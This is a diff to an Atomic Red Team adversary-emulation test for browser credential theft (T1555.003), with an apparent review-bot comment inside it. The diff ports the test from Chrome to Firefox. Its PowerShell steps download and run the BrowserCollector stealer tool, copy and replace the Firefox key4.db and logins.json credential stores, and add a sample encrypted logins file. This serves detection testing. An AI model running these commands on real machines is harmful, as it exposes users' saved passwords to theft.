diff --git a/atomics/T1555.003/T1555.003.yaml b/atomics/T1555.003/T1555.003.yaml
index 0f8976d1ab..4b6b595b05 100644
--- a/atomics/T1555.003/T1555.003.yaml
+++ b/atomics/T1555.003/T1555.003.yaml
@@ -429,16 +429,15 @@ atomic_tests:
dependency_executor_name: powershell
dependencies:
- description: |
- Google Chrome must be on the device.
+ Firefox must be on the device.
prereq_command: |
- if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}
+ if ((Test-Path "C:\Program Files\Mozilla Firefox\firefox.exe") -Or (Test-Path "C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
- $installer = "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi"
- Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi
- msiexec /i $installer /qn
- Start-Process -FilePath "chrome.exe"
- Stop-Process -Name "chrome"
+ $installer = "PathToAtomicsFolder\..\ExternalPayloads\FirefoxStubInstaller.exe"
+ Invoke-WebRequest -OutFile $installer "https://download.mozilla.org/?product=firefox-stub&os=win&lang=en-US"
+ Start-Process -FilePath $installer -Wait
+ Stop-Process -Name "firefox"
- description: |
BrowserCollector must exist in the bin directory
prereq_command: |
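Review bot: The new get_prereq_command runs the Firefox stub installer with no silent switch, whereas the Chrome step it replaces used `msiexec /i $installer /qn`, so `Start-Process -FilePath $installer -Wait` can block on an interactive installer window during an unattended prerequisite step. Mozilla's Windows installers accept `/S` for a silent install — confirm the stub build honours it, or fetch the full offline installer — e.g. `Start-Process -FilePath $installer -ArgumentList "/S" -Wait`. The following `Stop-Process -Name "firefox"` presumes the installer leaves Firefox running; if it does not, that line writes a "cannot find a process" error and no `*default-release*` profile is ever created, which the executor's `Gci -filter "*default-release*"` in the next hunk depends on, so an explicit Firefox launch before the stop (as the Chrome variant did with `Start-Process -FilePath "chrome.exe"`) would make the prereq deterministic. Note also that the stub URL pulls whatever build is current with no version pin or hash check, so the test environment is not reproducible run to run.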
@@ -447,22 +446,30 @@ atomic_tests:
New-Item -Type Directory "PathToAtomicsFolder\T1555.003\bin\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/SaulBerrenson/BrowserStealer/releases/download/1.0.0.4/BrowserCollector_x64.exe" -Outfile: "PathToAtomicsFolder\T1555.003\bin\BrowserCollector.exe"
- description: |
- Login Data file that is a copy of a chrome Login Data that contains credentials for the tool to "steal." Must exist at the specified path.
+ Login Data file that is a copy of a Firefox Login Data that contains credentials for the tool to "steal." Must exist at the specified path.
prereq_command: |-
- if (Test-Path "PathToAtomicsFolder\T1555.003\src\Login Data") {exit 0} else {exit 1}
+ if (Test-Path "PathToAtomicsFolder\T1555.003\src\key4.db") {exit 0} else {exit 1}
get_prereq_command: |-
- Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/src/Login%20Data?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\Login Data"
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/src/key4.db?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\key4.db"
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/src/logins.json?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\logins.json"
executor:
command: |
- Copy-Item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" -Destination "PathToAtomicsFolder\..\ExternalPayloads" > $null
- Remove-Item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" > $null
- Copy-Item "$env:PathToAtomicsFolder\T1555.003\src\Login Data" -Destination "$env:localappdata\Google\Chrome\User Data\Default\" > $null
+ $profile = (Gci -filter "*default-release*" -path $env:Appdata\Mozilla\Firefox\Profiles\).FullName
+ Copy-Item $profile\key4.db -Destination "PathToAtomicsFolder\..\ExternalPayloads" > $null
+ Copy-Item $profile\logins.json -Destination "PathToAtomicsFolder\..\ExternalPayloads" > $null
+ Remove-Item $profile\key4.db > $null
+ Remove-Item $profile\logins.json > $null
+ Copy-Item "$env:PathToAtomicsFolder\T1555.003\src\key4.db" -Destination $profile\ > $null
+ Copy-Item "$env:PathToAtomicsFolder\T1555.003\src\logins.json" -Destination $profile\ > $null
cd "$env:PathToAtomicsFolder\T1555.003\bin"
- .\BrowserCollector.exe
+ ""|.\BrowserCollector.exe
cleanup_command: |
- Remove-Item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" > $null
- Copy-Item "PathToAtomicsFolder\..\ExternalPayloads" -Destination "$env:localappdata\Google\Chrome\User Data\Default\Login Data" > $null
- Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\Login Data" > $null
+ $profile = (Gci -filter "*default-release*" -path $env:Appdata\Mozilla\Firefox\Profiles\).FullName
+ Remove-Item $profile\key4.db > $null
+ Remove-Item $profile\logins.json > $null
+ Copy-Item "PathToAtomicsFolder\..\ExternalPayloads" -Destination $profile\ > $null
+ Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\key4.db" > $null
+ Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\logins.json" > $null
name: powershell
- name: Dump Chrome Login Data with esentutl
auto_generated_guid: 70422253-8198-4019-b617-6be401b49fce
diff --git a/atomics/T1555.003/bin/BrowserCollector.exe b/atomics/T1555.003/bin/BrowserCollector.exe
deleted file mode 100644
index 18748d58b3..0000000000
Binary files a/atomics/T1555.003/bin/BrowserCollector.exe and /dev/null differ
diff --git a/atomics/T1555.003/src/key4.db b/atomics/T1555.003/src/key4.db
new file mode 100644
index 0000000000..bf8cb470fa
Binary files /dev/null and b/atomics/T1555.003/src/key4.db differ
diff --git a/atomics/T1555.003/src/logins.json b/atomics/T1555.003/src/logins.json
new file mode 100644
index 0000000000..85e26487df
--- /dev/null
+++ b/atomics/T1555.003/src/logins.json
@@ -0,0 +1 @@
+{"nextId":2,"logins":[{"id":1,"hostname":"https://practicetestautomation.com","httpRealm":null,"formSubmitURL":"https://practicetestautomation.com","usernameField":"username","passwordField":"password","encryptedUsername":"MDIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECJaRexB+HxT7BAhePSimnBX5dQ==","encryptedPassword":"MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECFs3vPPQrqJqBBDDqJi5FTWY9ci3V3PAspHl","guid":"{f4496af2-67e3-4e71-a6e0-a9215c8fea68}","encType":1,"timeCreated":1702659643977,"timeLastUsed":1702659643977,"timePasswordChanged":1702659643977,"timesUsed":1,"syncCounter":1,"everSynced":false,"encryptedUnknownFields":"MDIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECCB2pMUVOobJBAhvCulcD3S7Nw=="}],"potentiallyVulnerablePasswords":[],"dismissedBreachAlertsByLoginGUID":{},"version":3}
\ No newline at end of file